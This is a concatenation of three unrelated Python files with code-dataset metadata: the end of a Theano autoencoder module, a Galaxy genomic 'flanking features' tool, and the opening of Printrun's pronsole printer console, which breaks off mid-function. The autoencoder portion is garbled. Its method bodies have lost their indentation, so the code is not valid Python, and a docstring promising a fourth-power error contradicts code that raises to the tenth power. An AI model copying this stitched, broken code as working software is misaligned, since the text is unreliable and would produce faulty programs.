"""Performs one Gibbs sampling step from hidden to hidden layer."""
return self.sample_h_given_v(self.sample_v_given_h(hidden))
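    # Illustrative Gibbs chain sketch (not part of the original class): a
    # k-step reconstruction chain built from the samplers above.
    #
    #   v = X
    #   for _ in range(k):
    #       v = model.sample_vhv(v)  # one visible->hidden->visible step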
def _reconstruction_cross_entropy(self, X):
"""Computes the reconstruction cross-entropy on X.
:type X: theano.tensor.TensorType
:param X: A training batch. In comparison to a supervised model,
which computes cost on some response vector, the
unsupervised model has to compute cost on the inputs.
:returns: The reconstruction cross-entropy on X, as a number.
"""
activation_hidden = self.mean_h_given_v(X)
activation_visible = self.mean_v_given_h(activation_hidden)
        # The leading minus sign is deliberate: cross-entropy is the
        # negative log-likelihood of the reconstruction.
        return -TT.sum(X * TT.log(activation_visible) + (1 - X)
                       * TT.log(1 - activation_visible), axis=1)
def _reconstruction_squared_error(self, X):
"""Computes the reconstruction squared error on X.
:type X: theano.tensor.TensorType
:param X: A training batch. In comparison to a supervised model,
which computes cost on some response vector, the
unsupervised model has to compute cost on the inputs.
:returns: The reconstruction squared error on X, as a number.
"""
activation_hidden = self.mean_h_given_v(X)
activation_visible = self.mean_v_given_h(activation_hidden)
return (activation_visible - X) ** 2
def _reconstruction_hypercubic_exploded_error(self, X):
"""Computes the reconstruction hypercubic (to the power of 4) error
and multiplies it by a significant number."""
activation_hidden = self.mean_h_given_v(X)
activation_visible = self.mean_v_given_h(activation_hidden)
return 10.0 * ((activation_visible - X) ** 10)
def error(self, X):
"""Returns the mean reconstruction cross-entropy on X.
This is the same number which is used for model cost to optimize
in gradient descent, since without gold-standard data, we have
nothing to really compute any error on. So, validation and
testing can use this function in guarding against overfitting.
:type X: theano.tensor.TensorType
:param X: A training batch. In comparison to a supervised model,
which computes cost on some response vector, the
unsupervised model has to compute cost on the inputs.
:returns: The reconstruction cross-entropy (as a number)
"""
return self._cost(X)
# if self.reconstruction == 'cross-entropy':
# return TT.mean(self._reconstruction_cross_entropy(X))
# elif self.reconstruction == 'mse':
# return TT.mean(self._reconstruction_squared_error(X))
# elif self.reconstruction == 'exaggerated-mse':
# return TT.mean(self._reconstruction_hypercubic_exploded_error(X))
# else:
# raise ValueError('Invalid reconstruction set! %s' % self.reconstruction)
def _cost(self, X):
"""Returns the mean reconstruction cross-entropy on X.
This is the same number which is used for model error.
:type X: theano.tensor.TensorType
:param X: A training batch. In comparison to a supervised model,
which computes cost on some response vector, the
unsupervised model has to compute cost on the inputs.
:returns: The reconstruction cross-entropy (as a number)
"""
if self.reconstruction == 'cross-entropy':
cost = TT.mean(self._reconstruction_cross_entropy(X))
elif self.reconstruction == 'mse':
cost = TT.mean(self._reconstruction_squared_error(X))
elif self.reconstruction == 'exaggerated-mse':
cost = TT.mean(self._reconstruction_hypercubic_exploded_error(X))
else:
raise ValueError('Invalid reconstruction set! %s' % self.reconstruction)
        if self.L1_norm != 0.0:
            # L1 penalty: sum of absolute parameter values. (The previous
            # version summed Euclidean norms here, i.e. an L2-style penalty,
            # despite the L1 name and docstring.)
            cost += (TT.sum(TT.abs_(self.W))
                     + TT.sum(TT.abs_(self.W_prime))
                     + TT.sum(TT.abs_(self.b))
                     + TT.sum(TT.abs_(self.b_prime))) * self.L1_norm
if self.L2_norm != 0.0:
cost += (TT.sum(self.W ** 2) + TT.sum(self.W_prime ** 2)
+ TT.sum(self.b ** 2) + TT.sum(self.b_prime ** 2)) \
* self.L2_norm
if self.bias_decay != 0.0:
cost += (TT.sum(self.b ** 2) + TT.sum(self.b_prime ** 2)) \
* self.bias_decay
if self.sparsity_target is not None:
cost += self._sparsity_cross_entropy(X)
if self.output_sparsity_target is not None:
print 'Setting output sparsity target: {0}'.format(self.output_sparsity_target)
cost += self._output_sparsity_cross_entropy(X)
return cost
def _sparsity_cross_entropy(self, X):
"""
        Computes the KL divergence between the mean activation of each
        hidden neuron over the batch and the sparsity target.
        :param X: The input data batch.
        :return: The KL divergence summed over hidden units.
"""
mean_act = TT.mean(self.activation(TT.dot(X, self.W) + self.b),
axis=0)
rho_term = mean_act * TT.log(mean_act / self.sparsity_target)
mean_act_compl = 1.0 - mean_act
neg_rho_term = mean_act_compl * TT.log(mean_act_compl /
(1.0 - self.sparsity_target))
kl_divergence = TT.sum(rho_term + neg_rho_term)
return kl_divergence
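    # In math terms (illustrative): with rho = sparsity_target and rho_hat_j
    # the mean activation of hidden unit j over the batch, the penalty is
    #
    #   KL = sum_j [ rho_hat_j * log(rho_hat_j / rho)
    #                + (1 - rho_hat_j) * log((1 - rho_hat_j) / (1 - rho)) ]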
def _output_sparsity_cross_entropy(self, X):
"""
        Computes the KL divergence between the mean activation of each
        data point's output vector and the output sparsity target.
        :param X: The input data batch.
        :return: The KL divergence summed over data points.
"""
mean_act = TT.mean(self.activation(TT.dot(X, self.W) + self.b),
axis=1)
rho_term = mean_act * TT.log(mean_act / self.output_sparsity_target)
mean_act_compl = 1.0 - mean_act
neg_rho_term = mean_act_compl * TT.log(mean_act_compl /
(1.0 - self.output_sparsity_target))
kl_divergence = TT.sum(rho_term + neg_rho_term)
return kl_divergence
@classmethod
def _init_args(cls): # This method will get obsolete.
"""Returns a list of the required kwargs the class needs to be
successfully initialized.
Only returns args that are OVER the minimum defined in the
BaseModel.__init__() function definition.
        .. warning::
This method and its role is subject to change; it may also
be removed entirely.
:returns: A list of strings: ``['n_out', 'activation', 'rng']``
"""
return ['n_out', 'activation', 'rng', 'reconstruction']
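# Illustrative usage sketch (not part of the original module; the sizes and
# the 'mse' choice are hypothetical):
#
#   X = TT.matrix('X')
#   model = Autoencoder(inputs=X, n_in=784, n_out=100, reconstruction='mse')
#   cost_fn = theano.function([X], model._cost(X))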
|
hajicj/safire
|
build/lib/safire/learning/models/autoencoder.py
|
Python
|
gpl-3.0
| 17,198
|
[
"NEURON"
] |
e8407f60cd3b78ba69977de2e79ce8e809139da5d8a24136ba5d6764cc04abe4
|
#!/usr/bin/env python
#By: Guruprasad Ananda
"""
Fetch closest up/downstream interval from features corresponding to every interval in primary
usage: %prog primary_file features_file out_file direction
-1, --cols1=N,N,N,N: Columns for start, end, strand in first file
-2, --cols2=N,N,N,N: Columns for start, end, strand in second file
"""
from galaxy import eggs
import pkg_resources
pkg_resources.require( "bx-python" )
import sys, traceback, fileinput
from warnings import warn
from bx.cookbook import doc_optparse
from galaxy.tools.util.galaxyops import *
from bx.intervals.io import *
from bx.intervals.operations import quicksect
assert sys.version_info[:2] >= ( 2, 4 )
def get_closest_feature (node, direction, threshold_up, threshold_down, report_func_up, report_func_down):
    #direction=1 for +ve strand upstream and -ve strand downstream cases; it is 0 for +ve strand downstream and -ve strand upstream cases
    #threshold_up equals the interval start for the +ve strand, and the interval end for the -ve strand
    #threshold_down equals the interval end for the +ve strand, and the interval start for the -ve strand
if direction == 1:
if node.maxend < threshold_up:
if node.end == node.maxend:
report_func_up(node)
elif node.right and node.left:
if node.right.maxend == node.maxend:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.left.maxend == node.maxend:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.right and node.right.maxend == node.maxend:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.left and node.left.maxend == node.maxend:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.minend < threshold_up:
if node.end < threshold_up:
report_func_up(node)
if node.left and node.right:
if node.right.minend < threshold_up:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
if node.left.minend < threshold_up:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.left:
if node.left.minend < threshold_up:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif node.right:
if node.right.minend < threshold_up:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
elif direction == 0:
if node.start > threshold_down:
report_func_down(node)
if node.left:
get_closest_feature(node.left, direction, threshold_up, threshold_down, report_func_up, report_func_down)
else:
if node.right:
get_closest_feature(node.right, direction, threshold_up, threshold_down, report_func_up, report_func_down)
def proximal_region_finder(readers, region, comments=True):
primary = readers[0]
features = readers[1]
either = False
if region == 'Upstream':
up, down = True, False
elif region == 'Downstream':
up, down = False, True
else:
up, down = True, True
if region == 'Either':
either = True
# Read features into memory:
rightTree = quicksect.IntervalTree()
for item in features:
if type( item ) is GenomicInterval:
rightTree.insert( item, features.linenum, item.fields )
for interval in primary:
if type( interval ) is Header:
yield interval
        elif type( interval ) is Comment and comments:
yield interval
elif type( interval ) == GenomicInterval:
chrom = interval.chrom
start = int(interval.start)
end = int(interval.end)
strand = interval.strand
if chrom not in rightTree.chroms:
continue
else:
root = rightTree.chroms[chrom] #root node for the chrom tree
result_up = []
result_down = []
if (strand == '+' and up) or (strand == '-' and down):
#upstream +ve strand and downstream -ve strand cases
get_closest_feature (root, 1, start, None, lambda node: result_up.append( node ), None)
if (strand == '+' and down) or (strand == '-' and up):
#downstream +ve strand and upstream -ve strand case
get_closest_feature (root, 0, None, end, None, lambda node: result_down.append( node ))
if result_up:
outfields = list(interval)
                    if len(result_up) > 1: #result_up holds the intervals upstream of the given interval
ends = []
for n in result_up:
ends.append(n.end)
res_ind = ends.index(max(ends)) #fetch the index of the closest interval i.e. the interval with the max end from the results_up list
else:
res_ind = 0
if not(either):
map(outfields.append, result_up[res_ind].other)
yield outfields
if result_down:
outfields = list(interval)
if not(either):
map(outfields.append, result_down[-1].other) #The last element of result_down will be the closest element to the given interval
yield outfields
if either and (result_up or result_down):
if result_up and result_down:
if abs(start - int(result_up[res_ind].end)) <= abs(end - int(result_down[-1].start)):
map(outfields.append, result_up[res_ind].other)
else:
map(outfields.append, result_down[-1].other) #The last element of result_down will be the closest element to the given interval
elif result_up:
map(outfields.append, result_up[res_ind].other)
elif result_down:
map(outfields.append, result_down[-1].other) #The last element of result_down will be the closest element to the given interval
yield outfields
def main():
options, args = doc_optparse.parse( __doc__ )
try:
chr_col_1, start_col_1, end_col_1, strand_col_1 = parse_cols_arg( options.cols1 )
chr_col_2, start_col_2, end_col_2, strand_col_2 = parse_cols_arg( options.cols2 )
in_fname, in2_fname, out_fname, direction = args
except:
doc_optparse.exception()
g1 = NiceReaderWrapper( fileinput.FileInput( in_fname ),
chrom_col=chr_col_1,
start_col=start_col_1,
end_col=end_col_1,
strand_col=strand_col_1,
fix_strand=True )
g2 = NiceReaderWrapper( fileinput.FileInput( in2_fname ),
chrom_col=chr_col_2,
start_col=start_col_2,
end_col=end_col_2,
strand_col=strand_col_2,
fix_strand=True )
out_file = open( out_fname, "w" )
try:
for line in proximal_region_finder([g1,g2], direction):
if type( line ) is list:
out_file.write( "%s\n" % "\t".join( line ) )
else:
out_file.write( "%s\n" % line )
except ParseError, exc:
fail( "Invalid file format: %s" % str( exc ) )
print "Direction: %s" %(direction)
if g1.skipped > 0:
print skipped( g1, filedesc=" of 1st dataset" )
if g2.skipped > 0:
print skipped( g2, filedesc=" of 2nd dataset" )
if __name__ == "__main__":
main()
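# Illustrative invocation (not part of the original file; the file names are
# hypothetical). The column arguments give the chrom,start,end,strand
# positions in each input, as described in the module docstring:
#
#   python flanking_features.py primary.interval features.interval \
#       out.interval Upstream --cols1=1,2,3,6 --cols2=1,2,3,6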
|
volpino/Yeps-EURAC
|
tools/new_operations/flanking_features.py
|
Python
|
mit
| 8,583
|
[
"Galaxy"
] |
89c8a77ebc3d6dbb47a00d83829a262b1e01e7f4275edf919c030dc5a3525a0d
|
#!/usr/bin/env python
# This file is part of the Printrun suite.
#
# Printrun is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Printrun is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Printrun. If not, see <http://www.gnu.org/licenses/>.
import cmd
import glob
import os
import time
import threading
import sys
import shutil
import subprocess
import codecs
import argparse
import locale
import logging
import traceback
import re
from serial import SerialException
from . import printcore
from .utils import install_locale, run_command, get_command_output, \
format_time, format_duration, RemainingTimeEstimator, \
get_home_pos, parse_build_dimensions, parse_temperature_report, \
setup_logging
install_locale('pronterface')
from .settings import Settings, BuildDimensionsSetting
from .power import powerset_print_start, powerset_print_stop
from printrun import gcoder
from .rpc import ProntRPC
if os.name == "nt":
try:
import _winreg
except:
pass
READLINE = True
try:
import readline
try:
readline.rl.mode.show_all_if_ambiguous = "on" # config pyreadline on windows
except:
pass
except:
READLINE = False # neither readline module is available
tempreading_exp = re.compile("(^T:| T:)")
REPORT_NONE = 0
REPORT_POS = 1
REPORT_TEMP = 2
REPORT_MANUAL = 4
class Status(object):
def __init__(self):
self.extruder_temp = 0
self.extruder_temp_target = 0
self.bed_temp = 0
self.bed_temp_target = 0
self.print_job = None
self.print_job_progress = 1.0
def update_tempreading(self, tempstr):
temps = parse_temperature_report(tempstr)
if "T0" in temps and temps["T0"][0]: hotend_temp = float(temps["T0"][0])
elif "T" in temps and temps["T"][0]: hotend_temp = float(temps["T"][0])
else: hotend_temp = None
if "T0" in temps and temps["T0"][1]: hotend_setpoint = float(temps["T0"][1])
elif "T" in temps and temps["T"][1]: hotend_setpoint = float(temps["T"][1])
else: hotend_setpoint = None
if hotend_temp is not None:
self.extruder_temp = hotend_temp
if hotend_setpoint is not None:
self.extruder_temp_target = hotend_setpoint
bed_temp = float(temps["B"][0]) if "B" in temps and temps["B"][0] else None
if bed_temp is not None:
self.bed_temp = bed_temp
setpoint = temps["B"][1]
if setpoint:
self.bed_temp_target = float(setpoint)
@property
def bed_enabled(self):
return self.bed_temp != 0
@property
def extruder_enabled(self):
return self.extruder_temp != 0
class pronsole(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
if not READLINE:
self.completekey = None
self.status = Status()
self.dynamic_temp = False
self.compute_eta = None
self.statuscheck = False
self.status_thread = None
self.monitor_interval = 3
self.p = printcore.printcore()
self.p.recvcb = self.recvcb
self.p.startcb = self.startcb
self.p.endcb = self.endcb
self.p.layerchangecb = self.layer_change_cb
self.p.process_host_command = self.process_host_command
self.recvlisteners = []
self.in_macro = False
self.p.onlinecb = self.online
self.p.errorcb = self.logError
self.fgcode = None
self.filename = None
self.rpc_server = None
self.curlayer = 0
self.sdlisting = 0
self.sdlisting_echo = 0
self.sdfiles = []
self.paused = False
self.sdprinting = 0
self.uploading = 0 # Unused, just for pronterface generalization
self.temps = {"pla": "185", "abs": "230", "off": "0"}
self.bedtemps = {"pla": "60", "abs": "110", "off": "0"}
self.percentdone = 0
self.posreport = ""
self.tempreadings = ""
self.userm114 = 0
self.userm105 = 0
self.m105_waitcycles = 0
self.macros = {}
self.history_file = "~/.pronsole-history"
self.rc_loaded = False
self.processing_rc = False
self.processing_args = False
self.settings = Settings(self)
self.settings._add(BuildDimensionsSetting("build_dimensions", "200x200x100+0+0+0+0+0+0", _("Build dimensions"), _("Dimensions of Build Platform\n & optional offset of origin\n & optional switch position\n\nExamples:\n XXXxYYY\n XXX,YYY,ZZZ\n XXXxYYYxZZZ+OffX+OffY+OffZ\nXXXxYYYxZZZ+OffX+OffY+OffZ+HomeX+HomeY+HomeZ"), "Printer"), self.update_build_dimensions)
self.settings._port_list = self.scanserial
self.settings._temperature_abs_cb = self.set_temp_preset
self.settings._temperature_pla_cb = self.set_temp_preset
self.settings._bedtemp_abs_cb = self.set_temp_preset
self.settings._bedtemp_pla_cb = self.set_temp_preset
self.update_build_dimensions(None, self.settings.build_dimensions)
self.update_tcp_streaming_mode(None, self.settings.tcp_streaming_mode)
self.monitoring = 0
self.starttime = 0
self.extra_print_time = 0
self.silent = False
self.commandprefixes = 'MGT$'
self.promptstrs = {"offline": "%(bold)soffline>%(normal)s ",
"fallback": "%(bold)sPC>%(normal)s ",
"macro": "%(bold)s..>%(normal)s ",
"online": "%(bold)sT:%(extruder_temp_fancy)s%(progress_fancy)s>%(normal)s "}
# --------------------------------------------------------------
# General console handling
# --------------------------------------------------------------
def postloop(self):
self.p.disconnect()
cmd.Cmd.postloop(self)
def preloop(self):
self.log(_("Welcome to the printer console! Type \"help\" for a list of available commands."))
self.prompt = self.promptf()
cmd.Cmd.preloop(self)
    # We replace this function, defined in cmd.py.
    # Its default behavior with regard to Ctrl-C
    # and Ctrl-D doesn't make much sense...
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
"""
self.preloop()
if self.use_rawinput and self.completekey:
try:
import readline
self.old_completer = readline.get_completer()
readline.set_completer(self.complete)
readline.parse_and_bind(self.completekey + ": complete")
history = os.path.expanduser(self.history_file)
if os.path.exists(history):
readline.read_history_file(history)
except ImportError:
pass
try:
if intro is not None:
self.intro = intro
if self.intro:
self.stdout.write(str(self.intro) + "\n")
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue.pop(0)
else:
if self.use_rawinput:
try:
line = raw_input(self.prompt)
except EOFError:
self.log("")
self.do_exit("")
except KeyboardInterrupt:
self.log("")
line = ""
else:
self.stdout.write(self.prompt)
self.stdout.flush()
line = self.stdin.readline()
if not len(line):
line = ""
else:
line = line.rstrip('\r\n')
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
finally:
if self.use_rawinput and self.completekey:
try:
import readline
readline.set_completer(self.old_completer)
readline.write_history_file(history)
except ImportError:
pass
def confirm(self):
y_or_n = raw_input("y/n: ")
if y_or_n == "y":
return True
elif y_or_n != "n":
return self.confirm()
return False
def log(self, *msg):
msg = u"".join(unicode(i) for i in msg)
logging.info(msg)
def logError(self, *msg):
msg = u"".join(unicode(i) for i in msg)
logging.error(msg)
if not self.settings.error_command:
return
output = get_command_output(self.settings.error_command, {"$m": msg})
if output:
self.log("Error command output:")
self.log(output.rstrip())
def promptf(self):
"""A function to generate prompts so that we can do dynamic prompts. """
if self.in_macro:
promptstr = self.promptstrs["macro"]
elif not self.p.online:
promptstr = self.promptstrs["offline"]
elif self.status.extruder_enabled:
promptstr = self.promptstrs["online"]
else:
promptstr = self.promptstrs["fallback"]
if "%" not in promptstr:
return promptstr
else:
specials = {}
specials["extruder_temp"] = str(int(self.status.extruder_temp))
specials["extruder_temp_target"] = str(int(self.status.extruder_temp_target))
if self.status.extruder_temp_target == 0:
specials["extruder_temp_fancy"] = str(int(self.status.extruder_temp))
else:
specials["extruder_temp_fancy"] = "%s/%s" % (str(int(self.status.extruder_temp)), str(int(self.status.extruder_temp_target)))
if self.p.printing:
progress = int(1000 * float(self.p.queueindex) / len(self.p.mainqueue)) / 10
elif self.sdprinting:
progress = self.percentdone
else:
progress = 0.0
specials["progress"] = str(progress)
if self.p.printing or self.sdprinting:
specials["progress_fancy"] = " " + str(progress) + "%"
else:
specials["progress_fancy"] = ""
specials["bold"] = "\033[01m"
specials["normal"] = "\033[00m"
return promptstr % specials
def postcmd(self, stop, line):
""" A hook we override to generate prompts after
each command is executed, for the next prompt.
We also use it to send M105 commands so that
temp info gets updated for the prompt."""
if self.p.online and self.dynamic_temp:
self.p.send_now("M105")
self.prompt = self.promptf()
return stop
def kill(self):
self.statuscheck = False
if self.status_thread:
self.status_thread.join()
self.status_thread = None
if self.rpc_server is not None:
self.rpc_server.shutdown()
def write_prompt(self):
sys.stdout.write(self.promptf())
sys.stdout.flush()
def help_help(self, l = ""):
self.do_help("")
def do_gcodes(self, l = ""):
self.help_gcodes()
def help_gcodes(self):
self.log("Gcodes are passed through to the printer as they are")
def precmd(self, line):
if line.upper().startswith("M114"):
self.userm114 += 1
elif line.upper().startswith("M105"):
self.userm105 += 1
return line
def help_shell(self):
self.log("Executes a python command. Example:")
self.log("! os.listdir('.')")
def do_shell(self, l):
exec(l)
def emptyline(self):
"""Called when an empty line is entered - do not remove"""
pass
def default(self, l):
if l[0].upper() in self.commandprefixes.upper():
if self.p and self.p.online:
if not self.p.loud:
self.log("SENDING:" + l.upper())
self.p.send_now(l.upper())
else:
self.logError(_("Printer is not online."))
return
elif l[0] == "@":
if self.p and self.p.online:
if not self.p.loud:
self.log("SENDING:" + l[1:])
self.p.send_now(l[1:])
else:
self.logError(_("Printer is not online."))
return
else:
cmd.Cmd.default(self, l)
def do_exit(self, l):
if self.status.extruder_temp_target != 0:
self.log("Setting extruder temp to 0")
self.p.send_now("M104 S0.0")
if self.status.bed_enabled:
if self.status.bed_temp_target != 0:
self.log("Setting bed temp to 0")
self.p.send_now("M140 S0.0")
self.log("Disconnecting from printer...")
if self.p.printing:
self.log(_("Are you sure you want to exit while printing?\n\
(this will terminate the print)."))
if not self.confirm():
return
self.log(_("Exiting program. Goodbye!"))
self.p.disconnect()
self.kill()
sys.exit()
def help_exit(self):
self.log(_("Disconnects from the printer and exits the program."))
# --------------------------------------------------------------
# Macro handling
# --------------------------------------------------------------
def complete_macro(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.macros.keys() if i.startswith(text)]
elif len(line.split()) == 3 or (len(line.split()) == 2 and line[-1] == " "):
return [i for i in ["/D", "/S"] + self.completenames(text) if i.startswith(text)]
else:
return []
def hook_macro(self, l):
l = l.rstrip()
ls = l.lstrip()
ws = l[:len(l) - len(ls)] # just leading whitespace
if len(ws) == 0:
self.end_macro()
# pass the unprocessed line to regular command processor to not require empty line in .pronsolerc
return self.onecmd(l)
self.cur_macro_def += l + "\n"
def end_macro(self):
if "onecmd" in self.__dict__: del self.onecmd # remove override
self.in_macro = False
self.prompt = self.promptf()
if self.cur_macro_def != "":
self.macros[self.cur_macro_name] = self.cur_macro_def
macro = self.compile_macro(self.cur_macro_name, self.cur_macro_def)
setattr(self.__class__, "do_" + self.cur_macro_name, lambda self, largs, macro = macro: macro(self, *largs.split()))
setattr(self.__class__, "help_" + self.cur_macro_name, lambda self, macro_name = self.cur_macro_name: self.subhelp_macro(macro_name))
if not self.processing_rc:
self.log("Macro '" + self.cur_macro_name + "' defined")
# save it
if not self.processing_args:
macro_key = "macro " + self.cur_macro_name
macro_def = macro_key
if "\n" in self.cur_macro_def:
macro_def += "\n"
else:
macro_def += " "
macro_def += self.cur_macro_def
self.save_in_rc(macro_key, macro_def)
else:
self.logError("Empty macro - cancelled")
del self.cur_macro_name, self.cur_macro_def
def compile_macro_line(self, line):
line = line.rstrip()
ls = line.lstrip()
ws = line[:len(line) - len(ls)] # just leading whitespace
if ls == "" or ls.startswith('#'): return "" # no code
if ls.startswith('!'):
return ws + ls[1:] + "\n" # python mode
else:
ls = ls.replace('"', '\\"') # need to escape double quotes
ret = ws + 'self.precmd("' + ls + '".format(*arg))\n' # parametric command mode
return ret + ws + 'self.onecmd("' + ls + '".format(*arg))\n'
def compile_macro(self, macro_name, macro_def):
if macro_def.strip() == "":
self.logError("Empty macro - cancelled")
return
macro = None
pycode = "def macro(self,*arg):\n"
if "\n" not in macro_def.strip():
pycode += self.compile_macro_line(" " + macro_def.strip())
else:
lines = macro_def.split("\n")
for l in lines:
pycode += self.compile_macro_line(l)
        exec(pycode)
return macro
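    # For illustration, a one-line macro defined as "macro mymove move x {0}"
    # is compiled by the code above into roughly:
    #     def macro(self, *arg):
    #         self.precmd("move x {0}".format(*arg))
    #         self.onecmd("move x {0}".format(*arg))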
def start_macro(self, macro_name, prev_definition = "", suppress_instructions = False):
if not self.processing_rc and not suppress_instructions:
self.logError("Enter macro using indented lines, end with empty line")
self.cur_macro_name = macro_name
self.cur_macro_def = ""
self.onecmd = self.hook_macro # override onecmd temporarily
        self.in_macro = True  # so promptf() shows the macro continuation prompt
self.prompt = self.promptf()
def delete_macro(self, macro_name):
if macro_name in self.macros.keys():
delattr(self.__class__, "do_" + macro_name)
del self.macros[macro_name]
self.log("Macro '" + macro_name + "' removed")
if not self.processing_rc and not self.processing_args:
self.save_in_rc("macro " + macro_name, "")
else:
self.logError("Macro '" + macro_name + "' is not defined")
def do_macro(self, args):
if args.strip() == "":
self.print_topics("User-defined macros", map(str, self.macros.keys()), 15, 80)
return
arglist = args.split(None, 1)
macro_name = arglist[0]
if macro_name not in self.macros and hasattr(self.__class__, "do_" + macro_name):
self.logError("Name '" + macro_name + "' is being used by built-in command")
return
if len(arglist) == 2:
macro_def = arglist[1]
if macro_def.lower() == "/d":
self.delete_macro(macro_name)
return
if macro_def.lower() == "/s":
self.subhelp_macro(macro_name)
return
self.cur_macro_def = macro_def
self.cur_macro_name = macro_name
self.end_macro()
return
if macro_name in self.macros:
self.start_macro(macro_name, self.macros[macro_name])
else:
self.start_macro(macro_name)
def help_macro(self):
self.log("Define single-line macro: macro <name> <definition>")
self.log("Define multi-line macro: macro <name>")
self.log("Enter macro definition in indented lines. Use {0} .. {N} to substitute macro arguments")
self.log("Enter python code, prefixed with ! Use arg[0] .. arg[N] to substitute macro arguments")
self.log("Delete macro: macro <name> /d")
self.log("Show macro definition: macro <name> /s")
self.log("'macro' without arguments displays list of defined macros")
def subhelp_macro(self, macro_name):
if macro_name in self.macros.keys():
macro_def = self.macros[macro_name]
if "\n" in macro_def:
self.log("Macro '" + macro_name + "' defined as:")
self.log(self.macros[macro_name] + "----------------")
else:
self.log("Macro '" + macro_name + "' defined as: '" + macro_def + "'")
else:
self.logError("Macro '" + macro_name + "' is not defined")
# --------------------------------------------------------------
# Configuration handling
# --------------------------------------------------------------
    def set(self, var, value_str):
        try:
            t = type(getattr(self.settings, var))
            value = self.settings._set(var, value_str)
            if not self.processing_rc and not self.processing_args:
                self.save_in_rc("set " + var, "set %s %s" % (var, value))
        except AttributeError:
            logging.debug(_("Unknown variable '%s'") % var)
        except ValueError as ve:
            if hasattr(ve, "from_validator"):
                self.logError(_("Bad value %s for variable '%s': %s") % (value_str, var, ve.args[0]))
            else:
                self.logError(_("Bad value for variable '%s', expecting %s (%s)") % (var, repr(t)[1:-1], ve.args[0]))
def do_set(self, argl):
args = argl.split(None, 1)
if len(args) < 1:
for k in [kk for kk in dir(self.settings) if not kk.startswith("_")]:
self.log("%s = %s" % (k, str(getattr(self.settings, k))))
return
if len(args) < 2:
# Try getting the default value of the setting to check whether it
# actually exists
try:
getattr(self.settings, args[0])
except AttributeError:
logging.warning("Unknown variable '%s'" % args[0])
return
self.set(args[0], args[1])
def help_set(self):
self.log("Set variable: set <variable> <value>")
self.log("Show variable: set <variable>")
self.log("'set' without arguments displays all variables")
def complete_set(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in dir(self.settings) if not i.startswith("_") and i.startswith(text)]
elif len(line.split()) == 3 or (len(line.split()) == 2 and line[-1] == " "):
return [i for i in self.settings._tabcomplete(line.split()[1]) if i.startswith(text)]
else:
return []
def load_rc(self, rc_filename):
self.processing_rc = True
try:
rc = codecs.open(rc_filename, "r", "utf-8")
self.rc_filename = os.path.abspath(rc_filename)
for rc_cmd in rc:
if not rc_cmd.lstrip().startswith("#"):
self.onecmd(rc_cmd)
rc.close()
if hasattr(self, "cur_macro_def"):
self.end_macro()
self.rc_loaded = True
finally:
self.processing_rc = False
def load_default_rc(self, rc_filename = ".pronsolerc"):
if rc_filename == ".pronsolerc" and hasattr(sys, "frozen") and sys.frozen in ["windows_exe", "console_exe"]:
rc_filename = "printrunconf.ini"
try:
try:
self.load_rc(os.path.join(os.path.expanduser("~"), rc_filename))
except IOError:
self.load_rc(rc_filename)
except IOError:
# make sure the filename is initialized
self.rc_filename = os.path.abspath(os.path.join(os.path.expanduser("~"), rc_filename))
def save_in_rc(self, key, definition):
"""
Saves or updates macro or other definitions in .pronsolerc
        key is the prefix that determines what is being defined/updated (e.g. 'macro foo')
        definition is the full definition that is written to the file (e.g. 'macro foo move x 10')
Set key as empty string to just add (and not overwrite)
Set definition as empty string to remove it from .pronsolerc
To delete line from .pronsolerc, set key as the line contents, and definition as empty string
Only first definition with given key is overwritten.
Updates are made in the same file position.
Additions are made to the end of the file.
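        Example: save_in_rc("set port", "set port /dev/ttyUSB0") replaces the
        first existing "set port" line in place, or appends one if none exists.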
"""
rci, rco = None, None
if definition != "" and not definition.endswith("\n"):
definition += "\n"
try:
written = False
if os.path.exists(self.rc_filename):
shutil.copy(self.rc_filename, self.rc_filename + "~bak")
rci = codecs.open(self.rc_filename + "~bak", "r", "utf-8")
rco = codecs.open(self.rc_filename + "~new", "w", "utf-8")
if rci is not None:
overwriting = False
for rc_cmd in rci:
l = rc_cmd.rstrip()
ls = l.lstrip()
ws = l[:len(l) - len(ls)] # just leading whitespace
if overwriting and len(ws) == 0:
overwriting = False
if not written and key != "" and rc_cmd.startswith(key) and (rc_cmd + "\n")[len(key)].isspace():
overwriting = True
written = True
rco.write(definition)
if not overwriting:
rco.write(rc_cmd)
if not rc_cmd.endswith("\n"): rco.write("\n")
if not written:
rco.write(definition)
if rci is not None:
rci.close()
rco.close()
shutil.move(self.rc_filename + "~new", self.rc_filename)
# if definition != "":
# self.log("Saved '"+key+"' to '"+self.rc_filename+"'")
# else:
# self.log("Removed '"+key+"' from '"+self.rc_filename+"'")
        except Exception as e:
self.logError("Saving failed for ", key + ":", str(e))
finally:
del rci, rco
# --------------------------------------------------------------
# Configuration update callbacks
# --------------------------------------------------------------
def update_build_dimensions(self, param, value):
self.build_dimensions_list = parse_build_dimensions(value)
self.p.analyzer.home_pos = get_home_pos(self.build_dimensions_list)
def update_tcp_streaming_mode(self, param, value):
self.p.tcp_streaming_mode = self.settings.tcp_streaming_mode
def update_rpc_server(self, param, value):
if value:
